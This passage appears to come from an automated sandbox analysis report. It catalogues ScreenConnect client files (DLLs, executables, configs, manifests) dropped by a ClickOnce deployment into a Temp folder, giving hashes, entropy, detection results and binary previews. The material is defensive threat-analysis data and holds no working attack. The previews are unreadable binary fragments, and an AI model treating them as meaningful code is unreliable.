                                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                                                                                        MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                                                                                        SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                                                                                        SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                                                                                        SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.dll

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):68096
                                                                                                                                                                                                                                                                        Entropy (8bit):6.068776675019683
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                                                                                        MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                                                                                        SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                                                                                        SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                                                                                        SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.dll.genman

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1636
                                                                                                                                                                                                                                                                        Entropy (8bit):5.084538887646832
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                                                                                        MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                                                                                        SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                                                                                        SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                                                                                        SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):95520
                                                                                                                                                                                                                                                                        Entropy (8bit):6.505346220942731
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                                                                                        MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                                        SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                                                                                        SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                                                                                        SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Core.dll

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):548864
                                                                                                                                                                                                                                                                        Entropy (8bit):6.031251664661689
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                                                                                        MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                                                                                        SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                                                                                        SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                                                                                        SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Core.dll.genman

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1216
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                                                                                        MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                                                                                        SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                                                                                        SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                                                                                        SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Windows.dll

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1721856
                                                                                                                                                                                                                                                                        Entropy (8bit):6.639136400085158
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                                        MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                                                                                        SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                                                                                        SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                                                                                        SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Windows.dll.genman

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1982
                                                                                                                                                                                                                                                                        Entropy (8bit):5.057585371364542
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                                                                                        MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                                                                                        SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                                                                                        SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                                                                                        SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsBackstageShell.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):61216
                                                                                                                                                                                                                                                                        Entropy (8bit):6.31175789874945
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                                                                                        MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                                                                                        SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                                                                                        SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                                                                                        SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):601376
                                                                                                                                                                                                                                                                        Entropy (8bit):6.185921191564225
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                                                                                        MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                                        SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                                                                                        SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                                                                                        SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe.config

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe.genman

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2573
                                                                                                                                                                                                                                                                        Entropy (8bit):5.026361555169168
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                                                                                        MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                                                                                        SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                                                                                        SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                                                                                        SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe.manifest

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):17866
                                                                                                                                                                                                                                                                        Entropy (8bit):5.954687824833028
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
